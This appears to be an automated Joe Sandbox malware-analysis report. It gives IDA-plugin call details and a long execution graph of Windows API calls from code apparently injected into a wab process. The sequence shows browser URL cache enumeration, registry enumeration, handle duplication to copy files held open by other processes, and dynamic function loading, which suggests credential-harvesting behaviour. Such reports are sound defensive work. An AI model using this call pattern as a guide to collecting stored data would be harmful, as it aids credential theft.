                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,22C95C88,22C91D66,00000000,00000000,00000000,?,22C95E85,00000006,FlsSetValue,22C9E190,FlsSetValue,00000000), ref: 22C95D2D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3177248105-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 22C9655C
                                                                                                                  • Part of subcall function 22C962BC: IsProcessorFeaturePresent.KERNEL32(00000017,22C962AB,00000000,?,?,?,?,00000016,?,?,22C962B8,00000000,00000000,00000000,00000000,00000000), ref: 22C962BE
                                                                                                                  • Part of subcall function 22C962BC: GetCurrentProcess.KERNEL32(C0000417), ref: 22C962E0
                                                                                                                  • Part of subcall function 22C962BC: TerminateProcess.KERNEL32(00000000), ref: 22C962E7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                • String ID: *?$.
                                                                                                                • API String ID: 2667617558-3972193922
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strlen
                                                                                                                • String ID: : $Se.
                                                                                                                • API String ID: 4218353326-4089948878
                                                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                • Instruction ID: 20e686c08f4b978cd321a6466f3bc27deb05acde198e2e8503d23cd93c05abe3
                                                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                • Instruction Fuzzy Hash: AD11E7B1A00389AECB11CFA8D841BEEFBFCAF19314F104056E545E7212E6B05B02C765
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 22C92903
                                                                                                                  • Part of subcall function 22C935D2: RaiseException.KERNEL32(?,?,?,22C92925,00000000,00000000,00000000,?,?,?,?,?,22C92925,?,22CA21B8), ref: 22C93632
                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 22C92920
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                • String ID: Unknown exception
                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                • Opcode ID: ae3293707aa52de4af3e9d6a39bbae0bf120917b1ca64400dc6dc1e89b72b062
                                                                                                                • Instruction ID: 528e90ffc0610e7e4f2fe220ca94a0ca256546734e73163c761a300d4a1f79ba
                                                                                                                • Opcode Fuzzy Hash: ae3293707aa52de4af3e9d6a39bbae0bf120917b1ca64400dc6dc1e89b72b062
                                                                                                                • Instruction Fuzzy Hash: 87F02235A0070DB78B04ABA5EC44DBD736C9F10760B504270EAA4A74A8FBB1EA16C5C2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:6.3%
                                                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                Signature Coverage:1.6%
                                                                                                                Total number of Nodes:2000
                                                                                                                Total number of Limit Nodes:78
4454b9 38905->38906 38907 40b6ef 252 API calls 38905->38907 38906->38425 38907->38906 38908->38424 38909->38441 38910->38447 38911->38484 38912->38462 38913->38511 38914->38511 38915->38494 38916->38522 38917->38524 38918->38526 38920 414c2e 16 API calls 38919->38920 38921 40c2ae 38920->38921 38991 40c1d3 38921->38991 38926 40c3be 38943 40a8ab 38926->38943 38927 40afcf 2 API calls 38928 40c2fd FindFirstUrlCacheEntryW 38927->38928 38929 40c3b6 38928->38929 38930 40c31e wcschr 38928->38930 38931 40b04b ??3@YAXPAX 38929->38931 38932 40c331 38930->38932 38933 40c35e FindNextUrlCacheEntryW 38930->38933 38931->38926 38934 40a8ab 9 API calls 38932->38934 38933->38930 38935 40c373 GetLastError 38933->38935 38938 40c33e wcschr 38934->38938 38936 40c3ad FindCloseUrlCache 38935->38936 38937 40c37e 38935->38937 38936->38929 38939 40afcf 2 API calls 38937->38939 38938->38933 38940 40c34f 38938->38940 38941 40c391 FindNextUrlCacheEntryW 38939->38941 38942 40a8ab 9 API calls 38940->38942 38941->38930 38941->38936 38942->38933 39085 40a97a 38943->39085 38946 40a8cc 38946->38533 38947 40a8d0 7 API calls 38947->38946 39090 40b1ab ??3@YAXPAX ??3@YAXPAX 38948->39090 38950 40c3dd 38951 40b2cc 27 API calls 38950->38951 38952 40c3e7 38951->38952 39091 414592 RegOpenKeyExW 38952->39091 38954 40c3f4 38955 40c50e 38954->38955 38956 40c3ff 38954->38956 38970 405337 38955->38970 38957 40a9ce 4 API calls 38956->38957 38958 40c418 memset 38957->38958 39092 40aa1d 38958->39092 38961 40c471 38963 40c47a _wcsupr 38961->38963 38962 40c505 RegCloseKey 38962->38955 38964 40a8d0 7 API calls 38963->38964 38965 40c498 38964->38965 38966 40a8d0 7 API calls 38965->38966 38967 40c4ac memset 38966->38967 38968 40aa1d 38967->38968 38969 40c4e4 RegEnumValueW 38968->38969 38969->38962 38969->38963 39094 405220 38970->39094 38974 4099c6 2 API calls 38973->38974 38975 40a714 _wcslwr 38974->38975 38976 40c634 38975->38976 39151 405361 38976->39151 38979 40c65c wcslen 39154 4053b6 39 API calls 38979->39154 38980 
40c71d wcslen 38980->38540 38982 40c677 38983 40c713 38982->38983 39155 40538b 39 API calls 38982->39155 39157 4053df 39 API calls 38983->39157 38986 40c6a5 38986->38983 38987 40c6a9 memset 38986->38987 38988 40c6d3 38987->38988 39156 40c589 43 API calls 38988->39156 38990->38541 38992 40ae18 9 API calls 38991->38992 38998 40c210 38992->38998 38993 40ae51 9 API calls 38993->38998 38994 40c264 38995 40aebe FindClose 38994->38995 38997 40c26f 38995->38997 38996 40add4 2 API calls 38996->38998 39003 40e5ed memset memset 38997->39003 38998->38993 38998->38994 38998->38996 38999 40c231 _wcsicmp 38998->38999 39000 40c1d3 35 API calls 38998->39000 38999->38998 39001 40c248 38999->39001 39000->38998 39016 40c084 22 API calls 39001->39016 39004 414c2e 16 API calls 39003->39004 39005 40e63f 39004->39005 39006 409d1f 6 API calls 39005->39006 39007 40e658 39006->39007 39017 409b98 GetFileAttributesW 39007->39017 39009 40e667 39010 40e680 39009->39010 39011 409d1f 6 API calls 39009->39011 39018 409b98 GetFileAttributesW 39010->39018 39011->39010 39013 40e68f 39014 40c2d8 39013->39014 39019 40e4b2 39013->39019 39014->38926 39014->38927 39016->38998 39017->39009 39018->39013 39040 40e01e 39019->39040 39021 40e593 39023 40e5b0 39021->39023 39024 40e59c DeleteFileW 39021->39024 39022 40e521 39022->39021 39063 40e175 39022->39063 39025 40b04b ??3@YAXPAX 39023->39025 39024->39023 39026 40e5bb 39025->39026 39028 40e5c4 CloseHandle 39026->39028 39029 40e5cc 39026->39029 39028->39029 39031 40b633 ??3@YAXPAX 39029->39031 39030 40e573 39032 40e584 39030->39032 39033 40e57c FindCloseChangeNotification 39030->39033 39034 40e5db 39031->39034 39084 40b1ab ??3@YAXPAX ??3@YAXPAX 39032->39084 39033->39032 39037 40b633 ??3@YAXPAX 39034->39037 39036 40e540 39036->39030 39083 40e2ab 30 API calls 39036->39083 39038 40e5e3 39037->39038 39038->39014 39041 406214 22 API calls 39040->39041 39042 40e03c 39041->39042 39043 40e16b 39042->39043 39044 40dd85 75 API calls 39042->39044 39043->39022 39045 
40e06b 39044->39045 39045->39043 39046 40afcf ??2@YAPAXI ??3@YAXPAX 39045->39046 39047 40e08d OpenProcess 39046->39047 39048 40e0a4 GetCurrentProcess DuplicateHandle 39047->39048 39052 40e152 39047->39052 39049 40e0d0 GetFileSize 39048->39049 39050 40e14a CloseHandle 39048->39050 39053 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39049->39053 39050->39052 39051 40e160 39055 40b04b ??3@YAXPAX 39051->39055 39052->39051 39054 406214 22 API calls 39052->39054 39056 40e0ea 39053->39056 39054->39051 39055->39043 39057 4096dc CreateFileW 39056->39057 39058 40e0f1 CreateFileMappingW 39057->39058 39059 40e140 CloseHandle CloseHandle 39058->39059 39060 40e10b MapViewOfFile 39058->39060 39059->39050 39061 40e13b FindCloseChangeNotification 39060->39061 39062 40e11f WriteFile UnmapViewOfFile 39060->39062 39061->39059 39062->39061 39064 40e18c 39063->39064 39065 406b90 11 API calls 39064->39065 39066 40e19f 39065->39066 39067 40e1a7 memset 39066->39067 39068 40e299 39066->39068 39073 40e1e8 39067->39073 39069 4069a3 ??3@YAXPAX ??3@YAXPAX 39068->39069 39070 40e2a4 39069->39070 39070->39036 39071 406e8f 13 API calls 39071->39073 39072 406b53 SetFilePointerEx ReadFile 39072->39073 39073->39071 39073->39072 39074 40e283 39073->39074 39075 40dd50 _wcsicmp 39073->39075 39079 40742e 8 API calls 39073->39079 39080 40aae3 wcslen wcslen _memicmp 39073->39080 39081 40e244 _snwprintf 39073->39081 39076 40e291 39074->39076 39077 40e288 ??3@YAXPAX 39074->39077 39075->39073 39078 40aa04 ??3@YAXPAX 39076->39078 39077->39076 39078->39068 39079->39073 39080->39073 39082 40a8d0 7 API calls 39081->39082 39082->39073 39083->39036 39084->39021 39087 40a980 39085->39087 39086 40a8bb 39086->38946 39086->38947 39087->39086 39088 40a995 _wcsicmp 39087->39088 39089 40a99c wcscmp 39087->39089 39088->39087 39089->39087 39090->38950 39091->38954 39093 40aa23 RegEnumValueW 39092->39093 39093->38961 39093->38962 39095 405335 39094->39095 39096 40522a 39094->39096 39095->38540 39097 40b2cc 27 API 
calls 39096->39097 39098 405234 39097->39098 39099 40a804 8 API calls 39098->39099 39100 40523a 39099->39100 39139 40b273 39100->39139 39102 405248 _mbscpy _mbscat GetProcAddress 39103 40b273 27 API calls 39102->39103 39104 405279 39103->39104 39142 405211 GetProcAddress 39104->39142 39106 405282 39107 40b273 27 API calls 39106->39107 39108 40528f 39107->39108 39143 405211 GetProcAddress 39108->39143 39110 405298 39111 40b273 27 API calls 39110->39111 39112 4052a5 39111->39112 39144 405211 GetProcAddress 39112->39144 39114 4052ae 39115 40b273 27 API calls 39114->39115 39116 4052bb 39115->39116 39145 405211 GetProcAddress 39116->39145 39118 4052c4 39119 40b273 27 API calls 39118->39119 39120 4052d1 39119->39120 39146 405211 GetProcAddress 39120->39146 39122 4052da 39123 40b273 27 API calls 39122->39123 39124 4052e7 39123->39124 39147 405211 GetProcAddress 39124->39147 39126 4052f0 39127 40b273 27 API calls 39126->39127 39128 4052fd 39127->39128 39148 405211 GetProcAddress 39128->39148 39130 405306 39131 40b273 27 API calls 39130->39131 39132 405313 39131->39132 39149 405211 GetProcAddress 39132->39149 39134 40531c 39135 40b273 27 API calls 39134->39135 39136 405329 39135->39136 39150 405211 GetProcAddress 39136->39150 39138 405332 39138->39095 39140 40b58d 27 API calls 39139->39140 39141 40b18c 39140->39141 39141->39102 39142->39106 39143->39110 39144->39114 39145->39118 39146->39122 39147->39126 39148->39130 39149->39134 39150->39138 39152 405220 39 API calls 39151->39152 39153 405369 39152->39153 39153->38979 39153->38980 39154->38982 39155->38986 39156->38983 39157->38980 39159 40440c FreeLibrary 39158->39159 39160 40436d 39159->39160 39161 40a804 8 API calls 39160->39161 39162 404377 39161->39162 39163 404383 39162->39163 39164 404405 39162->39164 39165 40b273 27 API calls 39163->39165 39164->38552 39164->38554 39164->38555 39166 40438d GetProcAddress 39165->39166 39167 40b273 27 API calls 39166->39167 39168 4043a7 GetProcAddress 39167->39168 39169 40b273 27 API 
calls 39168->39169 39170 4043ba GetProcAddress 39169->39170 39171 40b273 27 API calls 39170->39171 39172 4043ce GetProcAddress 39171->39172 39173 40b273 27 API calls 39172->39173 39174 4043e2 GetProcAddress 39173->39174 39175 4043f1 39174->39175 39176 4043f7 39175->39176 39177 40440c FreeLibrary 39175->39177 39176->39164 39177->39164 39179 404413 FreeLibrary 39178->39179 39180 40441e 39178->39180 39179->39180 39180->38569 39181->38560 39183 40442e 39182->39183 39184 40447e 39182->39184 39185 40b2cc 27 API calls 39183->39185 39184->38560 39186 404438 39185->39186 39187 40a804 8 API calls 39186->39187 39188 40443e 39187->39188 39189 404445 39188->39189 39190 404467 39188->39190 39191 40b273 27 API calls 39189->39191 39190->39184 39192 404475 FreeLibrary 39190->39192 39193 40444f GetProcAddress 39191->39193 39192->39184 39193->39190 39194 404460 39193->39194 39194->39190 39196 4135f6 39195->39196 39197 4135eb FreeLibrary 39195->39197 39196->38572 39197->39196 39199 4449c4 39198->39199 39200 444a52 39198->39200 39201 40b2cc 27 API calls 39199->39201 39200->38589 39200->38590 39202 4449cb 39201->39202 39203 40a804 8 API calls 39202->39203 39204 4449d1 39203->39204 39205 40b273 27 API calls 39204->39205 39206 4449dc GetProcAddress 39205->39206 39207 40b273 27 API calls 39206->39207 39208 4449f3 GetProcAddress 39207->39208 39209 40b273 27 API calls 39208->39209 39210 444a04 GetProcAddress 39209->39210 39211 40b273 27 API calls 39210->39211 39212 444a15 GetProcAddress 39211->39212 39213 40b273 27 API calls 39212->39213 39214 444a26 GetProcAddress 39213->39214 39215 40b273 27 API calls 39214->39215 39216 444a37 GetProcAddress 39215->39216 39217 40b273 27 API calls 39216->39217 39218 444a48 GetProcAddress 39217->39218 39218->39200 39219->38600 39220->38600 39221->38600 39222->38600 39223->38591 39225 403a29 39224->39225 39239 403bed memset memset 39225->39239 39227 403ae7 39252 40b1ab ??3@YAXPAX ??3@YAXPAX 39227->39252 39228 403a3f memset 39234 403a2f 39228->39234 39230 
403aef 39230->38608 39231 409b98 GetFileAttributesW 39231->39234 39232 40a8d0 7 API calls 39232->39234 39233 409d1f 6 API calls 39233->39234 39234->39227 39234->39228 39234->39231 39234->39232 39234->39233 39236 40a051 GetFileTime FindCloseChangeNotification 39235->39236 39237 4039ca CompareFileTime 39235->39237 39236->39237 39237->38608 39238->38607 39240 414c2e 16 API calls 39239->39240 39241 403c38 39240->39241 39242 409719 2 API calls 39241->39242 39243 403c3f wcscat 39242->39243 39244 414c2e 16 API calls 39243->39244 39245 403c61 39244->39245 39246 409719 2 API calls 39245->39246 39247 403c68 wcscat 39246->39247 39253 403af5 39247->39253 39250 403af5 20 API calls 39251 403c95 39250->39251 39251->39234 39252->39230 39254 403b02 39253->39254 39255 40ae18 9 API calls 39254->39255 39263 403b37 39255->39263 39256 403bdb 39258 40aebe FindClose 39256->39258 39257 40add4 wcscmp wcscmp 39257->39263 39259 403be6 39258->39259 39259->39250 39260 40ae18 9 API calls 39260->39263 39261 40ae51 9 API calls 39261->39263 39262 40aebe FindClose 39262->39263 39263->39256 39263->39257 39263->39260 39263->39261 39263->39262 39264 40a8d0 7 API calls 39263->39264 39264->39263 39266 409d1f 6 API calls 39265->39266 39267 404190 39266->39267 39280 409b98 GetFileAttributesW 39267->39280 39269 40419c 39270 4041a7 6 API calls 39269->39270 39271 40435c 39269->39271 39273 40424f 39270->39273 39271->38634 39273->39271 39274 40425e memset 39273->39274 39276 409d1f 6 API calls 39273->39276 39277 40a8ab 9 API calls 39273->39277 39281 414842 39273->39281 39274->39273 39275 404296 wcscpy 39274->39275 39275->39273 39276->39273 39278 4042b6 memset memset _snwprintf wcscpy 39277->39278 39278->39273 39279->38632 39280->39269 39284 41443e 39281->39284 39283 414866 39283->39273 39285 41444b 39284->39285 39286 414451 39285->39286 39287 4144a3 GetPrivateProfileStringW 39285->39287 39288 414491 39286->39288 39289 414455 wcschr 39286->39289 39287->39283 39291 414495 WritePrivateProfileStringW 39288->39291 
39289->39288 39290 414463 _snwprintf 39289->39290 39290->39291 39291->39283 39292->38638 39294 40b2cc 27 API calls 39293->39294 39295 409615 39294->39295 39296 409d1f 6 API calls 39295->39296 39297 409625 39296->39297 39322 409b98 GetFileAttributesW 39297->39322 39299 409634 39300 409648 39299->39300 39323 4091b8 memset 39299->39323 39302 40b2cc 27 API calls 39300->39302 39304 408801 39300->39304 39303 40965d 39302->39303 39305 409d1f 6 API calls 39303->39305 39304->38641 39304->38642 39306 40966d 39305->39306 39375 409b98 GetFileAttributesW 39306->39375 39308 40967c 39308->39304 39309 409681 39308->39309 39376 409529 72 API calls 39309->39376 39311 409690 39311->39304 39312->38664 39313->38641 39314->38669 39322->39299 39377 40a6e6 WideCharToMultiByte 39323->39377 39325 409202 39378 444432 39325->39378 39328 40b273 27 API calls 39329 409236 39328->39329 39424 438552 39329->39424 39332 409383 39334 40b273 27 API calls 39332->39334 39336 409399 39334->39336 39335 409254 39337 40937b 39335->39337 39445 4253cf 17 API calls 39335->39445 39338 438552 134 API calls 39336->39338 39449 424f26 123 API calls 39337->39449 39356 4093a3 39338->39356 39341 409267 39342 4094ff 39453 443d90 39342->39453 39345 4251c4 137 API calls 39345->39356 39347 409507 39355 40951d 39347->39355 39473 408f2f 77 API calls 39347->39473 39349 4093df 39452 424f26 123 API calls 39349->39452 39353 4253cf 17 API calls 39353->39356 39355->39300 39356->39342 39356->39345 39356->39349 39356->39353 39358 4093e4 39356->39358 39450 4253af 17 API calls 39358->39450 39365 4093ed 39451 4253af 17 API calls 39365->39451 39368 4093f9 39368->39349 39369 409409 memcmp 39368->39369 39369->39349 39370 409421 memcmp 39369->39370 39375->39308 39376->39311 39377->39325 39474 4438b5 39378->39474 39380 44444c 39386 409215 39380->39386 39488 415a6d 39380->39488 39382 4442e6 11 API calls 39384 44469e 39382->39384 39383 444486 39385 4444b9 memcpy 39383->39385 39423 4444a4 39383->39423 39384->39386 39388 443d90 111 API calls 
39384->39388 39492 415258 39385->39492 39386->39328 39386->39355 39388->39386 39389 444524 39390 444541 39389->39390 39391 44452a 39389->39391 39495 444316 39390->39495 39392 416935 16 API calls 39391->39392 39392->39423 39395 444316 18 API calls 39396 444563 39395->39396 39397 444316 18 API calls 39396->39397 39398 44456f 39397->39398 39399 444316 18 API calls 39398->39399 39400 44457f 39399->39400 39400->39423 39509 432d4e 39400->39509 39423->39382 39562 438460 39424->39562 39426 409240 39426->39332 39427 4251c4 39426->39427 39574 424f07 39427->39574 39429 4251e4 39430 4251f7 39429->39430 39431 4251e8 39429->39431 39582 4250f8 39430->39582 39581 4446ea 11 API calls 39431->39581 39433 4251f2 39433->39335 39435 425209 39441 4250f8 127 API calls 39435->39441 39441->39435 39445->39341 39449->39332 39450->39365 39451->39368 39452->39342 39454 443da3 39453->39454 39455 443db6 39453->39455 39598 41707a 39454->39598 39455->39347 39457 443da8 39458 443dbc 39457->39458 39459 443dac 39457->39459 39473->39355 39475 4438d0 39474->39475 39485 4438c9 39474->39485 39476 415378 memcpy memcpy 39475->39476 39477 4438d5 39476->39477 39478 4154e2 10 API calls 39477->39478 39479 443906 39477->39479 39477->39485 39478->39479 39480 443970 memset 39479->39480 39479->39485 39483 44398b 39480->39483 39481 4439a0 39482 415700 10 API calls 39481->39482 39481->39485 39486 4439c0 39482->39486 39483->39481 39484 41975c 10 API calls 39483->39484 39484->39481 39485->39380 39486->39485 39487 418981 10 API calls 39486->39487 39487->39485 39489 415a77 39488->39489 39490 415a8d 39489->39490 39491 415a7e memset 39489->39491 39490->39383 39491->39490 39493 4438b5 11 API calls 39492->39493 39494 41525d 39493->39494 39494->39389 39496 444328 39495->39496 39497 444423 39496->39497 39498 44434e 39496->39498 39499 4446ea 11 API calls 39497->39499 39500 432d4e memset memset memcpy 39498->39500 39506 444381 39499->39506 39501 44435a 39500->39501 39503 444375 39501->39503 39508 44438b 39501->39508 39502 432d4e 
memset memset memcpy 39504 4443ec 39502->39504 39505 416935 16 API calls 39503->39505 39504->39506 39507 416935 16 API calls 39504->39507 39505->39506 39506->39395 39507->39506 39508->39502 39510 432d65 39509->39510 39511 432d58 39509->39511 39563 41703f 11 API calls 39562->39563 39564 43847a 39563->39564 39565 43848a 39564->39565 39566 43847e 39564->39566 39568 438270 134 API calls 39565->39568 39567 4446ea 11 API calls 39566->39567 39570 438488 39567->39570 39569 4384aa 39568->39569 39569->39570 39571 424f26 123 API calls 39569->39571 39570->39426 39572 4384bb 39571->39572 39573 438270 134 API calls 39572->39573 39573->39570 39575 424f1f 39574->39575 39576 424f0c 39574->39576 39578 424eea 11 API calls 39575->39578 39577 416760 11 API calls 39576->39577 39579 424f18 39577->39579 39580 424f24 39578->39580 39579->39429 39580->39429 39581->39433 39583 425108 39582->39583 39589 42510d 39582->39589 39584 424f74 124 API calls 39583->39584 39584->39589 39585 42569b 125 API calls 39586 42516e 39585->39586 39588 415c7d 16 API calls 39586->39588 39587 425115 39587->39435 39588->39587 39589->39585 39589->39587 39599 417085 39598->39599 39600 4170ab 39598->39600 39599->39600 39601 416760 11 API calls 39599->39601 39600->39457 39602 4170a4 39601->39602 39602->39457 39641 413f4f 39614->39641 39617 413f37 K32GetModuleFileNameExW 39618 413f4a 39617->39618 39618->38696 39620 413969 wcscpy 39619->39620 39621 41396c wcschr 39619->39621 39633 413a3a 39620->39633 39621->39620 39623 41398e 39621->39623 39646 4097f7 wcslen wcslen _memicmp 39623->39646 39625 41399a 39626 4139a4 memset 39625->39626 39627 4139e6 39625->39627 39647 409dd5 GetWindowsDirectoryW wcscpy 39626->39647 39629 413a31 wcscpy 39627->39629 39630 4139ec memset 39627->39630 39629->39633 39648 409dd5 GetWindowsDirectoryW wcscpy 39630->39648 39631 4139c9 wcscpy wcscat 39631->39633 39633->38696 39634 413a11 memcpy wcscat 39634->39633 39636 413cb0 GetModuleHandleW 39635->39636 39637 413cda 39635->39637 39636->39637 39638 
413cbf GetProcAddress 39636->39638 39639 413ce3 GetProcessTimes 39637->39639 39640 413cf6 39637->39640 39638->39637 39639->38704 39640->38704 39642 413f2f 39641->39642 39643 413f54 39641->39643 39642->39617 39642->39618 39644 40a804 8 API calls 39643->39644 39645 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39644->39645 39645->39642 39646->39625 39647->39631 39648->39634 39649->38725 39650->38748 39652 409cf9 GetVersionExW 39651->39652 39653 409d0a 39651->39653 39652->39653 39653->38754 39653->38758 39654->38760 39655->38763 39656->38765 39657->38830 39659 40bba5 39658->39659 39706 40cc26 39659->39706 39662 40bd4b 39727 40cc0c 39662->39727 39667 40b2cc 27 API calls 39668 40bbef 39667->39668 39734 40ccf0 _wcsicmp 39668->39734 39670 40bbf5 39670->39662 39735 40ccb4 6 API calls 39670->39735 39672 40bc26 39673 40cf04 17 API calls 39672->39673 39674 40bc2e 39673->39674 39675 40bd43 39674->39675 39676 40b2cc 27 API calls 39674->39676 39677 40cc0c 4 API calls 39675->39677 39678 40bc40 39676->39678 39677->39662 39736 40ccf0 _wcsicmp 39678->39736 39680 40bc46 39680->39675 39681 40bc61 memset memset WideCharToMultiByte 39680->39681 39737 40103c strlen 39681->39737 39683 40bcc0 39684 40b273 27 API calls 39683->39684 39685 40bcd0 memcmp 39684->39685 39685->39675 39686 40bce2 39685->39686 39687 404423 37 API calls 39686->39687 39688 40bd10 39687->39688 39688->39675 39689 40bd3a LocalFree 39688->39689 39690 40bd1f memcpy 39688->39690 39689->39675 39690->39689 39692 409a74 GetTempFileNameW 39691->39692 39693 409a66 GetWindowsDirectoryW 39691->39693 39692->38844 39693->39692 39694->38845 39695->38882 39696->38882 39697->38882 39698->38882 39699->38882 39700->38882 39701->38882 39702->38882 39703->38882 39704->38857 39705->38879 39738 4096c3 CreateFileW 39706->39738 39708 40cc34 39709 40cc3d GetFileSize 39708->39709 39717 40bbca 39708->39717 39710 40afcf 2 API calls 39709->39710 39711 40cc64 39710->39711 39739 40a2ef ReadFile 39711->39739 39713 
40cc71 39740 40ab4a MultiByteToWideChar 39713->39740 39715 40cc95 FindCloseChangeNotification 39716 40b04b ??3@YAXPAX 39715->39716 39716->39717 39717->39662 39718 40cf04 39717->39718 39719 40b633 ??3@YAXPAX 39718->39719 39720 40cf14 39719->39720 39746 40b1ab ??3@YAXPAX ??3@YAXPAX 39720->39746 39722 40bbdd 39722->39662 39722->39667 39723 40cf1b 39723->39722 39725 40cfef 39723->39725 39747 40cd4b 39723->39747 39726 40cd4b 14 API calls 39725->39726 39726->39722 39728 40b633 ??3@YAXPAX 39727->39728 39729 40cc15 39728->39729 39730 40aa04 ??3@YAXPAX 39729->39730 39731 40cc1d 39730->39731 39796 40b1ab ??3@YAXPAX ??3@YAXPAX 39731->39796 39733 40b7d4 memset CreateFileW 39733->38837 39733->38838 39734->39670 39735->39672 39736->39680 39737->39683 39738->39708 39739->39713 39741 40ab6b 39740->39741 39745 40ab93 39740->39745 39742 40a9ce 4 API calls 39741->39742 39743 40ab74 39742->39743 39744 40ab7c MultiByteToWideChar 39743->39744 39744->39745 39745->39715 39746->39723 39748 40cd7b 39747->39748 39781 40aa29 39748->39781 39750 40cef5 39751 40aa04 ??3@YAXPAX 39750->39751 39752 40cefd 39751->39752 39752->39723 39754 40aa29 6 API calls 39755 40ce1d 39754->39755 39756 40aa29 6 API calls 39755->39756 39757 40ce3e 39756->39757 39758 40ce6a 39757->39758 39789 40abb7 wcslen memmove 39757->39789 39759 40ce9f 39758->39759 39792 40abb7 wcslen memmove 39758->39792 39761 40a8d0 7 API calls 39759->39761 39765 40ceb5 39761->39765 39762 40ce56 39790 40aa71 wcslen 39762->39790 39764 40ce8b 39793 40aa71 wcslen 39764->39793 39771 40a8d0 7 API calls 39765->39771 39768 40ce5e 39791 40abb7 wcslen memmove 39768->39791 39769 40ce93 39794 40abb7 wcslen memmove 39769->39794 39773 40cecb 39771->39773 39795 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39773->39795 39775 40cedd 39776 40aa04 ??3@YAXPAX 39775->39776 39777 40cee5 39776->39777 39778 40aa04 ??3@YAXPAX 39777->39778 39779 40ceed 39778->39779 39780 40aa04 ??3@YAXPAX 39779->39780 39780->39750 39782 40aa33 39781->39782 39783 40aa63 39781->39783 
39784 40aa44 39782->39784 39785 40aa38 wcslen 39782->39785 39783->39750 39783->39754 39786 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39784->39786 39785->39784 39787 40aa4d 39786->39787 39787->39783 39788 40aa51 memcpy 39787->39788 39788->39783 39789->39762 39790->39768 39791->39758 39792->39764 39793->39769 39794->39759 39795->39775 39796->39733 39797->38897 39798->38905 39808 44def7 39809 44df07 39808->39809 39810 44df00 ??3@YAXPAX 39808->39810 39811 44df17 39809->39811 39812 44df10 ??3@YAXPAX 39809->39812 39810->39809 39813 44df27 39811->39813 39814 44df20 ??3@YAXPAX 39811->39814 39812->39811 39815 44df37 39813->39815 39816 44df30 ??3@YAXPAX 39813->39816 39814->39813 39816->39815 37668 44dea5 37669 44deb5 FreeLibrary 37668->37669 37670 44dec3 37668->37670 37669->37670 39817 4148b6 FindResourceW 39818 4148f9 39817->39818 39819 4148cf SizeofResource 39817->39819 39819->39818 39820 4148e0 LoadResource 39819->39820 39820->39818 39821 4148ee LockResource 39820->39821 39821->39818 37844 415304 ??3@YAXPAX 39822 441b3f 39832 43a9f6 39822->39832 39824 441b61 40005 4386af memset 39824->40005 39826 44189a 39827 4418e2 39826->39827 39831 442bd4 39826->39831 39829 4418ea 39827->39829 40006 4414a9 12 API calls 39827->40006 39831->39829 40007 441409 memset 39831->40007 39833 43aa20 39832->39833 39834 43aadf 39832->39834 39833->39834 39835 43aa34 memset 39833->39835 39834->39824 39836 43aa56 39835->39836 39837 43aa4d 39835->39837 40008 43a6e7 39836->40008 40016 42c02e memset 39837->40016 39842 43aad3 40018 4169a7 11 API calls 39842->40018 39843 43aaae 39843->39834 39843->39842 39858 43aae5 